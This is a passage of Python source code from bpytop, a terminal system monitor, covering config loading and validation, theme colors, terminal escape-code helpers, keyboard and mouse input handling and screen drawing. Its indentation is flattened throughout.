#* Show swap as a disk, ignores show_swap value above, inserts itself after first disk.
swap_disk=$swap_disk
#* If mem box should be split to also show disks info.
show_disks=$show_disks
#* Set fixed values for network graphs, default "10M" = 10 Mibibytes, possible units "K", "M", "G", append with "bit" for bits instead of bytes, i.e "100mbit"
net_download="$net_download"
net_upload="$net_upload"
#* Start in network graphs auto rescaling mode, ignores any values set above and rescales down to 10 Kibibytes at the lowest.
net_auto=$net_auto
#* Sync the scaling for download and upload to whichever currently has the highest scale
net_sync=$net_sync
#* If the network graphs color gradient should scale to bandwith usage or auto scale, bandwith usage is based on "net_download" and "net_upload" values
net_color_fixed=$net_color_fixed
#* Show battery stats in top right if battery is present
show_battery=$show_battery
#* Show init screen at startup, the init screen is purely cosmetical
show_init=$show_init
#* Enable check for new version from github.com/aristocratos/bpytop at start.
update_check=$update_check
#* Set loglevel for "~/.config/bpytop/error.log" levels are: "ERROR" "WARNING" "INFO" "DEBUG".
#* The level set includes all lower levels, i.e. "DEBUG" will show all logging info.
log_level=$log_level
''')
CONFIG_DIR: str = f'{os.path.expanduser("~")}/.config/bpytop'
if not os.path.isdir(CONFIG_DIR):
try:
os.makedirs(CONFIG_DIR)
os.mkdir(f'{CONFIG_DIR}/themes')
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
CONFIG_FILE: str = f'{CONFIG_DIR}/bpytop.conf'
THEME_DIR: str = ""
if os.path.isdir(f'{os.path.dirname(__file__)}/bpytop-themes'):
THEME_DIR = f'{os.path.dirname(__file__)}/bpytop-themes'
else:
for td in ["/usr/local/", "/usr/", "/snap/bpytop/current/usr/"]:
if os.path.isdir(f'{td}share/bpytop/themes'):
THEME_DIR = f'{td}share/bpytop/themes'
break
USER_THEME_DIR: str = f'{CONFIG_DIR}/themes'
CORES: int = psutil.cpu_count(logical=False) or 1
THREADS: int = psutil.cpu_count(logical=True) or 1
THREAD_ERROR: int = 0
DEFAULT_THEME: Dict[str, str] = {
"main_bg" : "",
"main_fg" : "#cc",
"title" : "#ee",
"hi_fg" : "#969696",
"selected_bg" : "#7e2626",
"selected_fg" : "#ee",
"inactive_fg" : "#40",
"graph_text" : "#60",
"meter_bg" : "#40",
"proc_misc" : "#0de756",
"cpu_box" : "#3d7b46",
"mem_box" : "#8a882e",
"net_box" : "#423ba5",
"proc_box" : "#923535",
"div_line" : "#30",
"temp_start" : "#4897d4",
"temp_mid" : "#5474e8",
"temp_end" : "#ff40b6",
"cpu_start" : "#50f095",
"cpu_mid" : "#f2e266",
"cpu_end" : "#fa1e1e",
"free_start" : "#223014",
"free_mid" : "#b5e685",
"free_end" : "#dcff85",
"cached_start" : "#0b1a29",
"cached_mid" : "#74e6fc",
"cached_end" : "#26c5ff",
"available_start" : "#292107",
"available_mid" : "#ffd77a",
"available_end" : "#ffb814",
"used_start" : "#3b1f1c",
"used_mid" : "#d9626d",
"used_end" : "#ff4769",
"download_start" : "#231a63",
"download_mid" : "#4f43a3",
"download_end" : "#b0a9de",
"upload_start" : "#510554",
"upload_mid" : "#7d4180",
"upload_end" : "#dcafde",
"process_start" : "#80d0a3",
"process_mid" : "#dcd179",
"process_end" : "#d45454",
}
MENUS: Dict[str, Dict[str, Tuple[str, ...]]] = {
"options" : {
"normal" : (
"┌─┐┌─┐┌┬┐┬┌─┐┌┐┌┌─┐",
"│ │├─┘ │ ││ ││││└─┐",
"└─┘┴ ┴ ┴└─┘┘└┘└─┘"),
"selected" : (
"╔═╗╔═╗╔╦╗╦╔═╗╔╗╔╔═╗",
"║ ║╠═╝ ║ ║║ ║║║║╚═╗",
"╚═╝╩ ╩ ╩╚═╝╝╚╝╚═╝") },
"help" : {
"normal" : (
"┬ ┬┌─┐┬ ┌─┐",
"├─┤├┤ │ ├─┘",
"┴ ┴└─┘┴─┘┴ "),
"selected" : (
"╦ ╦╔═╗╦ ╔═╗",
"╠═╣║╣ ║ ╠═╝",
"╩ ╩╚═╝╩═╝╩ ") },
"quit" : {
"normal" : (
"┌─┐ ┬ ┬ ┬┌┬┐",
"│─┼┐│ │ │ │ ",
"└─┘└└─┘ ┴ ┴ "),
"selected" : (
"╔═╗ ╦ ╦ ╦╔╦╗ ",
"║═╬╗║ ║ ║ ║ ",
"╚═╝╚╚═╝ ╩ ╩ ") }
}
MENU_COLORS: Dict[str, Tuple[str, ...]] = {
"normal" : ("#0fd7ff", "#00bfe6", "#00a6c7", "#008ca8"),
"selected" : ("#ffa50a", "#f09800", "#db8b00", "#c27b00")
}
#? Units for floating_humanizer function
UNITS: Dict[str, Tuple[str, ...]] = {
"bit" : ("bit", "Kib", "Mib", "Gib", "Tib", "Pib", "Eib", "Zib", "Yib", "Bib", "GEb"),
"byte" : ("Byte", "KiB", "MiB", "GiB", "TiB", "PiB", "EiB", "ZiB", "YiB", "BiB", "GEB")
}
#? Setup error logger ---------------------------------------------------------------->
try:
errlog = logging.getLogger("ErrorLogger")
errlog.setLevel(logging.DEBUG)
eh = logging.handlers.RotatingFileHandler(f'{CONFIG_DIR}/error.log', maxBytes=1048576, backupCount=4)
eh.setLevel(logging.DEBUG)
eh.setFormatter(logging.Formatter("%(asctime)s | %(levelname)s: %(message)s", datefmt="%d/%m/%y (%X)"))
errlog.addHandler(eh)
except PermissionError:
print(f'ERROR!\nNo permission to write to "{CONFIG_DIR}" directory!')
raise SystemExit(1)
#? Timers for testing and debugging -------------------------------------------------------------->
class TimeIt:
timers: Dict[str, float] = {}
paused: Dict[str, float] = {}
@classmethod
def start(cls, name):
cls.timers[name] = time()
@classmethod
def pause(cls, name):
if name in cls.timers:
cls.paused[name] = time() - cls.timers[name]
del cls.timers[name]
@classmethod
def stop(cls, name):
if name in cls.timers:
total: float = time() - cls.timers[name]
del cls.timers[name]
if name in cls.paused:
total += cls.paused[name]
del cls.paused[name]
errlog.debug(f'{name} completed in {total:.6f} seconds')
def timeit_decorator(func):
def timed(*args, **kw):
ts = time()
out = func(*args, **kw)
errlog.debug(f'{func.__name__} completed in {time() - ts:.6f} seconds')
return out
return timed
#? Set up config class and load config ----------------------------------------------------------->
class Config:
'''Holds all config variables and functions for loading from and saving to disk'''
keys: List[str] = ["color_theme", "update_ms", "proc_sorting", "proc_reversed", "proc_tree", "check_temp", "draw_clock", "background_update", "custom_cpu_name",
"proc_colors", "proc_gradient", "proc_per_core", "proc_mem_bytes", "disks_filter", "update_check", "log_level", "mem_graphs", "show_swap",
"swap_disk", "show_disks", "net_download", "net_upload", "net_auto", "net_color_fixed", "show_init", "view_mode", "theme_background",
"net_sync", "show_battery", "tree_depth", "cpu_sensor", "show_coretemp"]
conf_dict: Dict[str, Union[str, int, bool]] = {}
color_theme: str = "Default"
theme_background: bool = True
update_ms: int = 2000
proc_sorting: str = "cpu lazy"
proc_reversed: bool = False
proc_tree: bool = False
tree_depth: int = 3
proc_colors: bool = True
proc_gradient: bool = True
proc_per_core: bool = False
proc_mem_bytes: bool = True
check_temp: bool = True
cpu_sensor: str = "Auto"
show_coretemp: bool = True
draw_clock: str = "%X"
background_update: bool = True
custom_cpu_name: str = ""
disks_filter: str = ""
update_check: bool = True
mem_graphs: bool = True
show_swap: bool = True
swap_disk: bool = True
show_disks: bool = True
net_download: str = "10M"
net_upload: str = "10M"
net_color_fixed: bool = False
net_auto: bool = True
net_sync: bool = False
show_battery: bool = True
show_init: bool = True
view_mode: str = "full"
log_level: str = "WARNING"
warnings: List[str] = []
info: List[str] = []
sorting_options: List[str] = ["pid", "program", "arguments", "threads", "user", "memory", "cpu lazy", "cpu responsive"]
log_levels: List[str] = ["ERROR", "WARNING", "INFO", "DEBUG"]
view_modes: List[str] = ["full", "proc", "stat"]
cpu_sensors: List[str] = [ "Auto" ]
if hasattr(psutil, "sensors_temperatures"):
try:
_temps = psutil.sensors_temperatures()
if _temps:
for _name, _entries in _temps.items():
for _num, _entry in enumerate(_entries, 1):
if hasattr(_entry, "current"):
cpu_sensors.append(f'{_name}:{_num if _entry.label == "" else _entry.label}')
except:
pass
changed: bool = False
recreate: bool = False
config_file: str = ""
_initialized: bool = False
def __init__(self, path: str):
self.config_file = path
conf: Dict[str, Union[str, int, bool]] = self.load_config()
if not "version" in conf.keys():
self.recreate = True
self.info.append(f'Config file malformatted or missing, will be recreated on exit!')
elif conf["version"] != VERSION:
self.recreate = True
self.info.append(f'Config file version and bpytop version missmatch, will be recreated on exit!')
for key in self.keys:
if key in conf.keys() and conf[key] != "_error_":
setattr(self, key, conf[key])
else:
self.recreate = True
self.conf_dict[key] = getattr(self, key)
self._initialized = True
def __setattr__(self, name, value):
if self._initialized:
object.__setattr__(self, "changed", True)
object.__setattr__(self, name, value)
if name not in ["_initialized", "recreate", "changed"]:
self.conf_dict[name] = value
def load_config(self) -> Dict[str, Union[str, int, bool]]:
'''Load config from file, set correct types for values and return a dict'''
new_config: Dict[str,Union[str, int, bool]] = {}
conf_file: str = ""
if os.path.isfile(self.config_file):
conf_file = self.config_file
elif os.path.isfile("/etc/bpytop.conf"):
conf_file = "/etc/bpytop.conf"
else:
return new_config
try:
with open(conf_file, "r") as f:
for line in f:
line = line.strip()
if line.startswith("#? Config"):
new_config["version"] = line[line.find("v. ") + 3:]
for key in self.keys:
if line.startswith(key):
line = line.replace(key + "=", "")
if line.startswith('"'):
line = line.strip('"')
if type(getattr(self, key)) == int:
try:
new_config[key] = int(line)
except ValueError:
self.warnings.append(f'Config key "{key}" should be an integer!')
if type(getattr(self, key)) == bool:
try:
new_config[key] = bool(strtobool(line))
except ValueError:
self.warnings.append(f'Config key "{key}" can only be True or False!')
if type(getattr(self, key)) == str:
new_config[key] = str(line)
except Exception as e:
errlog.exception(str(e))
if "proc_sorting" in new_config and not new_config["proc_sorting"] in self.sorting_options:
new_config["proc_sorting"] = "_error_"
self.warnings.append(f'Config key "proc_sorted" didn\'t get an acceptable value!')
if "log_level" in new_config and not new_config["log_level"] in self.log_levels:
new_config["log_level"] = "_error_"
self.warnings.append(f'Config key "log_level" didn\'t get an acceptable value!')
if "view_mode" in new_config and not new_config["view_mode"] in self.view_modes:
new_config["view_mode"] = "_error_"
self.warnings.append(f'Config key "view_mode" didn\'t get an acceptable value!')
if isinstance(new_config["update_ms"], int) and new_config["update_ms"] < 100:
new_config["update_ms"] = 100
self.warnings.append(f'Config key "update_ms" can\'t be lower than 100!')
for net_name in ["net_download", "net_upload"]:
if net_name in new_config and not new_config[net_name][0].isdigit(): # type: ignore
new_config[net_name] = "_error_"
if "cpu_sensor" in new_config and not new_config["cpu_sensor"] in self.cpu_sensors:
new_config["cpu_sensor"] = "_error_"
self.warnings.append(f'Config key "cpu_sensor" does not contain an available sensor!')
return new_config
def save_config(self):
'''Save current config to config file if difference in values or version, creates a new file if not found'''
if not self.changed and not self.recreate: return
try:
with open(self.config_file, "w" if os.path.isfile(self.config_file) else "x") as f:
f.write(DEFAULT_CONF.substitute(self.conf_dict))
except Exception as e:
errlog.exception(str(e))
try:
CONFIG: Config = Config(CONFIG_FILE)
if DEBUG:
errlog.setLevel(logging.DEBUG)
else:
errlog.setLevel(getattr(logging, CONFIG.log_level))
DEBUG = CONFIG.log_level == "DEBUG"
errlog.info(f'New instance of bpytop version {VERSION} started with pid {os.getpid()}')
errlog.info(f'Loglevel set to {"DEBUG" if DEBUG else CONFIG.log_level}')
errlog.debug(f'Using psutil version {".".join(str(x) for x in psutil.version_info)}')
errlog.debug(f'CMD: {" ".join(sys.argv)}')
if CONFIG.info:
for info in CONFIG.info:
errlog.info(info)
CONFIG.info = []
if CONFIG.warnings:
for warning in CONFIG.warnings:
errlog.warning(warning)
CONFIG.warnings = []
except Exception as e:
errlog.exception(f'{e}')
raise SystemExit(1)
if psutil.version_info[0] < 5 or (psutil.version_info[0] == 5 and psutil.version_info[1] < 7):
warn = f'psutil version {".".join(str(x) for x in psutil.version_info)} detected, version 5.7.0 or later required for full functionality!'
print("WARNING!", warn)
errlog.warning(warn)
#? Classes --------------------------------------------------------------------------------------->
class Term:
"""Terminal info and commands"""
width: int = 0
height: int = 0
resized: bool = False
_w : int = 0
_h : int = 0
fg: str = "" #* Default foreground color
bg: str = "" #* Default background color
hide_cursor = "\033[?25l" #* Hide terminal cursor
show_cursor = "\033[?25h" #* Show terminal cursor
alt_screen = "\033[?1049h" #* Switch to alternate screen
normal_screen = "\033[?1049l" #* Switch to normal screen
clear = "\033[2J\033[0;0f" #* Clear screen and set cursor to position 0,0
mouse_on = "\033[?1002h\033[?1015h\033[?1006h" #* Enable reporting of mouse position on click and release
mouse_off = "\033[?1002l" #* Disable mouse reporting
mouse_direct_on = "\033[?1003h" #* Enable reporting of mouse position at any movement
mouse_direct_off = "\033[?1003l" #* Disable direct mouse reporting
winch = threading.Event()
@classmethod
def refresh(cls, *args, force: bool = False):
"""Update width, height and set resized flag if terminal has been resized"""
if cls.resized: cls.winch.set(); return
cls._w, cls._h = os.get_terminal_size()
if (cls._w, cls._h) == (cls.width, cls.height) and not force: return
if force: Collector.collect_interrupt = True
while (cls._w, cls._h) != (cls.width, cls.height) or (cls._w < 80 or cls._h < 24):
if Init.running: Init.resized = True
CpuBox.clock_block = True
cls.resized = True
Collector.collect_interrupt = True
cls.width, cls.height = cls._w, cls._h
Draw.now(Term.clear)
Draw.now(f'{create_box(cls._w // 2 - 25, cls._h // 2 - 2, 50, 3, "resizing", line_color=Colors.green, title_color=Colors.white)}',
f'{Mv.r(12)}{Colors.default}{Colors.black_bg}{Fx.b}Width : {cls._w} Height: {cls._h}{Fx.ub}{Term.bg}{Term.fg}')
if cls._w < 80 or cls._h < 24:
while cls._w < 80 or cls._h < 24:
Draw.now(Term.clear)
Draw.now(f'{create_box(cls._w // 2 - 25, cls._h // 2 - 2, 50, 4, "warning", line_color=Colors.red, title_color=Colors.white)}',
f'{Mv.r(12)}{Colors.default}{Colors.black_bg}{Fx.b}Width: {Colors.red if cls._w < 80 else Colors.green}{cls._w} ',
f'{Colors.default}Height: {Colors.red if cls._h < 24 else Colors.green}{cls._h}{Term.bg}{Term.fg}',
f'{Mv.to(cls._h // 2, cls._w // 2 - 23)}{Colors.default}{Colors.black_bg}Width and Height needs to be at least 80 x 24 !{Fx.ub}{Term.bg}{Term.fg}')
cls.winch.wait(0.3)
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
else:
cls.winch.wait(0.3)
cls.winch.clear()
cls._w, cls._h = os.get_terminal_size()
Key.mouse = {}
Box.calc_sizes()
if Init.running: cls.resized = False; return
if Menu.active: Menu.resized = True
Box.draw_bg(now=False)
cls.resized = False
Timer.finish()
@staticmethod
def echo(on: bool):
"""Toggle input echo"""
(iflag, oflag, cflag, lflag, ispeed, ospeed, cc) = termios.tcgetattr(sys.stdin.fileno())
if on:
lflag |= termios.ECHO # type: ignore
else:
lflag &= ~termios.ECHO # type: ignore
new_attr = [iflag, oflag, cflag, lflag, ispeed, ospeed, cc]
termios.tcsetattr(sys.stdin.fileno(), termios.TCSANOW, new_attr)
@staticmethod
def title(text: str = "") -> str:
out: str = f'{os.environ.get("TERMINAL_TITLE", "")}'
if out and text: out += " "
if text: out += f'{text}'
return f'\033]0;{out}\a'
class Fx:
"""Text effects
* trans(string: str): Replace whitespace with escape move right to not overwrite background behind whitespace.
* uncolor(string: str) : Removes all 24-bit color and returns string ."""
start = "\033[" #* Escape sequence start
sep = ";" #* Escape sequence separator
end = "m" #* Escape sequence end
reset = rs = "\033[0m" #* Reset foreground/background color and text effects
bold = b = "\033[1m" #* Bold on
unbold = ub = "\033[22m" #* Bold off
dark = d = "\033[2m" #* Dark on
undark = ud = "\033[22m" #* Dark off
italic = i = "\033[3m" #* Italic on
unitalic = ui = "\033[23m" #* Italic off
underline = u = "\033[4m" #* Underline on
ununderline = uu = "\033[24m" #* Underline off
blink = bl = "\033[5m" #* Blink on
unblink = ubl = "\033[25m" #* Blink off
strike = s = "\033[9m" #* Strike / crossed-out on
unstrike = us = "\033[29m" #* Strike / crossed-out off
#* Precompiled regex for finding a 24-bit color escape sequence in a string
color_re = re.compile(r"\033\[\d+;\d?;?\d*;?\d*;?\d*m")
@staticmethod
def trans(string: str):
return string.replace(" ", "\033[1C")
@classmethod
def uncolor(cls, string: str) -> str:
return f'{cls.color_re.sub("", string)}'
class Raw(object):
"""Set raw input mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.original_stty = termios.tcgetattr(self.stream)
tty.setcbreak(self.stream)
def __exit__(self, type, value, traceback):
termios.tcsetattr(self.stream, termios.TCSANOW, self.original_stty)
class Nonblocking(object):
"""Set nonblocking mode for device"""
def __init__(self, stream):
self.stream = stream
self.fd = self.stream.fileno()
def __enter__(self):
self.orig_fl = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl | os.O_NONBLOCK)
def __exit__(self, *args):
fcntl.fcntl(self.fd, fcntl.F_SETFL, self.orig_fl)
class Mv:
"""Class with collection of cursor movement functions: .t[o](line, column) | .r[ight](columns) | .l[eft](columns) | .u[p](lines) | .d[own](lines) | .save() | .restore()"""
@staticmethod
def to(line: int, col: int) -> str:
return f'\033[{line};{col}f' #* Move cursor to line, column
@staticmethod
def right(x: int) -> str: #* Move cursor right x columns
return f'\033[{x}C'
@staticmethod
def left(x: int) -> str: #* Move cursor left x columns
return f'\033[{x}D'
@staticmethod
def up(x: int) -> str: #* Move cursor up x lines
return f'\033[{x}A'
@staticmethod
def down(x: int) -> str: #* Move cursor down x lines
return f'\033[{x}B'
save: str = "\033[s" #* Save cursor position
restore: str = "\033[u" #* Restore saved cursor postion
t = to
r = right
l = left
u = up
d = down
class Key:
"""Handles the threaded input reader for keypresses and mouse events"""
list: List[str] = []
mouse: Dict[str, List[List[int]]] = {}
mouse_pos: Tuple[int, int] = (0, 0)
escape: Dict[Union[str, Tuple[str, str]], str] = {
"\n" : "enter",
("\x7f", "\x08") : "backspace",
("[A", "OA") : "up",
("[B", "OB") : "down",
("[D", "OD") : "left",
("[C", "OC") : "right",
"[2~" : "insert",
"[3~" : "delete",
"[H" : "home",
"[F" : "end",
"[5~" : "page_up",
"[6~" : "page_down",
"\t" : "tab",
"[Z" : "shift_tab",
"OP" : "f1",
"OQ" : "f2",
"OR" : "f3",
"OS" : "f4",
"[15" : "f5",
"[17" : "f6",
"[18" : "f7",
"[19" : "f8",
"[20" : "f9",
"[21" : "f10",
"[23" : "f11",
"[24" : "f12"
}
new = threading.Event()
idle = threading.Event()
mouse_move = threading.Event()
mouse_report: bool = False
idle.set()
stopping: bool = False
started: bool = False
reader: threading.Thread
@classmethod
def start(cls):
cls.stopping = False
cls.reader = threading.Thread(target=cls._get_key)
cls.reader.start()
cls.started = True
@classmethod
def stop(cls):
if cls.started and cls.reader.is_alive():
cls.stopping = True
try:
cls.reader.join()
except:
pass
@classmethod
def last(cls) -> str:
if cls.list: return cls.list.pop()
else: return ""
@classmethod
def get(cls) -> str:
if cls.list: return cls.list.pop(0)
else: return ""
@classmethod
def get_mouse(cls) -> Tuple[int, int]:
if cls.new.is_set():
cls.new.clear()
return cls.mouse_pos
@classmethod
def mouse_moved(cls) -> bool:
if cls.mouse_move.is_set():
cls.mouse_move.clear()
return True
else:
return False
@classmethod
def has_key(cls) -> bool:
return bool(cls.list)
@classmethod
def clear(cls):
cls.list = []
@classmethod
def input_wait(cls, sec: float = 0.0, mouse: bool = False) -> bool:
'''Returns True if key is detected else waits out timer and returns False'''
if cls.list: return True
if mouse: Draw.now(Term.mouse_direct_on)
cls.new.wait(sec if sec > 0 else 0.0)
if mouse: Draw.now(Term.mouse_direct_off, Term.mouse_on)
if cls.new.is_set():
cls.new.clear()
return True
else:
return False
@classmethod
def break_wait(cls):
cls.list.append("_null")
cls.new.set()
sleep(0.01)
cls.new.clear()
@classmethod
def _get_key(cls):
"""Get a key or escape sequence from stdin, convert to readable format and save to keys list. Meant to be run in it's own thread."""
input_key: str = ""
clean_key: str = ""
try:
while not cls.stopping:
with Raw(sys.stdin):
if not select([sys.stdin], [], [], 0.1)[0]: #* Wait 100ms for input on stdin then restart loop to check for stop flag
continue
input_key += sys.stdin.read(1) #* Read 1 key safely with blocking on
if input_key == "\033": #* If first character is a escape sequence keep reading
cls.idle.clear() #* Report IO block in progress to prevent Draw functions from getting a IO Block error
Draw.idle.wait() #* Wait for Draw function to finish if busy
with Nonblocking(sys.stdin): #* Set non blocking to prevent read stall
input_key += sys.stdin.read(20)
if input_key.startswith("\033[<"):
_ = sys.stdin.read(1000)
cls.idle.set() #* Report IO blocking done
#errlog.debug(f'{repr(input_key)}')
if input_key == "\033": clean_key = "escape" #* Key is "escape" key if only containing \033
elif input_key.startswith(("\033[<0;", "\033[<35;", "\033[<64;", "\033[<65;")): #* Detected mouse event
try:
cls.mouse_pos = (int(input_key.split(";")[1]), int(input_key.split(";")[2].rstrip("mM")))
except:
pass
else:
if input_key.startswith("\033[<35;"): #* Detected mouse move in mouse direct mode
cls.mouse_move.set()
cls.new.set()
elif input_key.startswith("\033[<64;"): #* Detected mouse scroll up
clean_key = "mouse_scroll_up"
elif input_key.startswith("\033[<65;"): #* Detected mouse scroll down
clean_key = "mouse_scroll_down"
elif input_key.startswith("\033[<0;") and input_key.endswith("m"): #* Detected mouse click release
if Menu.active:
clean_key = "mouse_click"
else:
for key_name, positions in cls.mouse.items(): #* Check if mouse position is clickable
if list(cls.mouse_pos) in positions:
clean_key = key_name
break
else:
clean_key = "mouse_click"
elif input_key == "\\": clean_key = "\\" #* Clean up "\" to not return escaped
else:
for code in cls.escape.keys(): #* Go trough dict of escape codes to get the cleaned key name
if input_key.lstrip("\033").startswith(code):
clean_key = cls.escape[code]
break
else: #* If not found in escape dict and length of key is 1, assume regular character
if len(input_key) == 1:
clean_key = input_key
if clean_key:
cls.list.append(clean_key) #* Store up to 10 keys in input queue for later processing
if len(cls.list) > 10: del cls.list[0]
clean_key = ""
cls.new.set() #* Set threading event to interrupt main thread sleep
input_key = ""
except Exception as e:
errlog.exception(f'Input thread failed with exception: {e}')
cls.idle.set()
cls.list.clear()
clean_quit(1, thread=True)
class Draw:
'''Holds the draw buffer and manages IO blocking queue
* .buffer([+]name[!], *args, append=False, now=False, z=100) : Add *args to buffer
* - Adding "+" prefix to name sets append to True and appends to name's current string
* - Adding "!" suffix to name sets now to True and print name's current string
* .out(clear=False) : Print all strings in buffer, clear=True clear all buffers after
* .now(*args) : Prints all arguments as a string
* .clear(*names) : Clear named buffers, all if no argument
* .last_screen() : Prints all saved buffers
'''
strings: Dict[str, str] = {}
z_order: Dict[str, int] = {}
saved: Dict[str, str] = {}
save: Dict[str, bool] = {}
once: Dict[str, bool] = {}
idle = threading.Event()
idle.set()
@classmethod
def now(cls, *args):
'''Wait for input reader and self to be idle then print to screen'''
Key.idle.wait()
cls.idle.wait()
cls.idle.clear()
try:
print(*args, sep="", end="", flush=True)
except BlockingIOError:
pass
Key.idle.wait()
print(*args, sep="", end="", flush=True)
cls.idle.set()
@classmethod
def buffer(cls, name: str, *args: str, append: bool = False, now: bool = False, z: int = 100, only_save: bool = False, no_save: bool = False, once: bool = False):
string: str = ""
if name.startswith("+"):
name = name.lstrip("+")
append = True
if name.endswith("!"):
name = name.rstrip("!")
now = True
cls.save[name] = not no_save
cls.once[name] = once
if not name in cls.z_order or z != 100: cls.z_order[name] = z
if args: string = "".join(args)
if only_save:
if name not in cls.saved or not append: cls.saved[name] = ""
cls.saved[name] += string
else:
if name not in cls.strings or not append: cls.strings[name] = ""
cls.strings[name] += string
if now:
cls.out(name)
@classmethod
def out(cls, *names: str, clear = False):
out: str = ""
if not cls.strings: return
if names:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in names and name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = cls.strings[name]
if clear or cls.once[name]:
cls.clear(name)
cls.now(out)
else:
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in cls.strings:
out += cls.strings[name]
if cls.save[name]:
cls.saved[name] = cls.strings[name]
if cls.once[name] and not clear:
cls.clear(name)
if clear:
cls.clear()
cls.now(out)
@classmethod
def saved_buffer(cls) -> str:
out: str = ""
for name in sorted(cls.z_order, key=cls.z_order.get, reverse=True): #type: ignore
if name in cls.saved:
out += cls.saved[name]
return out
@classmethod
def clear(cls, *names, saved: bool = False):
if names:
for name in names:
if name in cls.strings:
del cls.strings[name]
if name in cls.save:
del cls.save[name]
if name in cls.once:
del cls.once[name]
if saved:
if name in cls.saved:
del cls.saved[name]
if name in cls.z_order:
del cls.z_order[name]
else:
cls.strings = {}
cls.save = {}
cls.once = {}
if saved:
cls.saved = {}
cls.z_order = {}
class Color:
'''Holds representations for a 24-bit color value
__init__(color, depth="fg", default=False)
-- color accepts 6 digit hexadecimal: string "#RRGGBB", 2 digit hexadecimal: string "#FF" or decimal RGB "255 255 255" as a string.
-- depth accepts "fg" or "bg"
__call__(*args) joins str arguments to a string and apply color
__str__ returns escape sequence to set color
__iter__ returns iteration over red, green and blue in integer values of 0-255.
* Values: .hexa: str | .dec: Tuple[int, int, int] | .red: int | .green: int | .blue: int | .depth: str | .escape: str
'''
hexa: str; dec: Tuple[int, int, int]; red: int; green: int; blue: int; depth: str; escape: str; default: bool
def __init__(self, color: str, depth: str = "fg", default: bool = False):
self.depth = depth
self.default = default
try:
if not color:
self.dec = (-1, -1, -1)
self.hexa = ""
self.red = self.green = self.blue = -1
self.escape = "\033[49m" if depth == "bg" and default else ""
return
elif color.startswith("#"):
self.hexa = color
if len(self.hexa) == 3:
self.hexa += self.hexa[1:3] + self.hexa[1:3]
c = int(self.hexa[1:3], base=16)
self.dec = (c, c, c)
elif len(self.hexa) == 7:
self.dec = (int(self.hexa[1:3], base=16), int(self.hexa[3:5], base=16), int(self.hexa[5:7], base=16))
else:
raise ValueError(f'Incorrectly formatted hexadecimal rgb string: {self.hexa}')
else:
c_t = tuple(map(int, color.split(" ")))
if len(c_t) == 3:
self.dec = c_t #type: ignore
else:
raise ValueError(f'RGB dec should be "0-255 0-255 0-255"')
ct = self.dec[0] + self.dec[1] + self.dec[2]
if ct > 255*3 or ct < 0:
raise ValueError(f'RGB values out of range: {color}')
except Exception as e:
errlog.exception(str(e))
self.escape = ""
return
if self.dec and not self.hexa: self.hexa = f'{hex(self.dec[0]).lstrip("0x").zfill(2)}{hex(self.dec[1]).lstrip("0x").zfill(2)}{hex(self.dec[2]).lstrip("0x").zfill(2)}'
if self.dec and self.hexa:
self.red, self.green, self.blue = self.dec
self.escape = f'\033[{38 if self.depth == "fg" else 48};2;{";".join(str(c) for c in self.dec)}m'
def __str__(self) -> str:
return self.escape
def __repr__(self) -> str:
return repr(self.escape)
def __iter__(self) -> Iterable:
for c in self.dec: yield c
def __call__(self, *args: str) -> str:
if len(args) < 1: return ""
return f'{self.escape}{"".join(args)}{getattr(Term, self.depth)}'
@staticmethod
def escape_color(hexa: str = "", r: int = 0, g: int = 0, b: int = 0, depth: str = "fg") -> str:
"""Returns escape sequence to set color
* accepts either 6 digit hexadecimal hexa="#RRGGBB", 2 digit hexadecimal: hexa="#FF"
* or decimal RGB: r=0-255, g=0-255, b=0-255
* depth="fg" or "bg"
"""
dint: int = 38 if depth == "fg" else 48
color: str = ""
if hexa:
try:
if len(hexa) == 3:
c = int(hexa[1:], base=16)
color = f'\033[{dint};2;{c};{c};{c}m'
elif len(hexa) == 7:
color = f'\033[{dint};2;{int(hexa[1:3], base=16)};{int(hexa[3:5], base=16)};{int(hexa[5:7], base=16)}m'
except ValueError as e:
errlog.exception(f'{e}')
else:
color = f'\033[{dint};2;{r};{g};{b}m'
return color
@classmethod
def fg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="fg")
else: return cls.escape_color(hexa=args[0], depth="fg")
@classmethod
def bg(cls, *args) -> str:
if len(args) > 2: return cls.escape_color(r=args[0], g=args[1], b=args[2], depth="bg")
else: return cls.escape_color(hexa=args[0], depth="bg")
class Colors:
'''Standard colors for menus and dialogs'''
default = Color("#cc")
white = Color("#ff")
red = Color("#bf3636")
green = Color("#68bf36")
blue = Color("#0fd7ff")
yellow = Color("#db8b00")
black_bg = Color("#00", depth="bg")
null = Color("")
class Theme:
'''__init__ accepts a dict containing { "color_element" : "color" }'''
themes: Dict[str, str] = {}
cached: Dict[str, Dict[str, str]] = { "Default" : DEFAULT_THEME }
current: str = ""
main_bg = main_fg = title = hi_fg = selected_bg = selected_fg = inactive_fg = proc_misc = cpu_box = mem_box = net_box = proc_box = div_line = temp_start = temp_mid = temp_end = cpu_start = cpu_mid = cpu_end = free_start = free_mid = free_end = cached_start = cached_mid = cached_end = available_start = available_mid = available_end = used_start = used_mid = used_end = download_start = download_mid = download_end = upload_start = upload_mid = upload_end = graph_text = meter_bg = process_start = process_mid = process_end = Colors.default
gradient: Dict[str, List[str]] = {
"temp" : [],
"cpu" : [],
"free" : [],
"cached" : [],
"available" : [],
"used" : [],
"download" : [],
"upload" : [],
"proc" : [],
"proc_color" : [],
"process" : [],
}
def __init__(self, theme: str):
self.refresh()
self._load_theme(theme)
def __call__(self, theme: str):
for k in self.gradient.keys(): self.gradient[k] = []
self._load_theme(theme)
def _load_theme(self, theme: str):
tdict: Dict[str, str]
if theme in self.cached:
tdict = self.cached[theme]
elif theme in self.themes:
tdict = self._load_file(self.themes[theme])
self.cached[theme] = tdict
else:
errlog.warning(f'No theme named "{theme}" found!')
theme = "Default"
CONFIG.color_theme = theme
tdict = DEFAULT_THEME
self.current = theme
#if CONFIG.color_theme != theme: CONFIG.color_theme = theme
if not "graph_text" in tdict and "inactive_fg" in tdict:
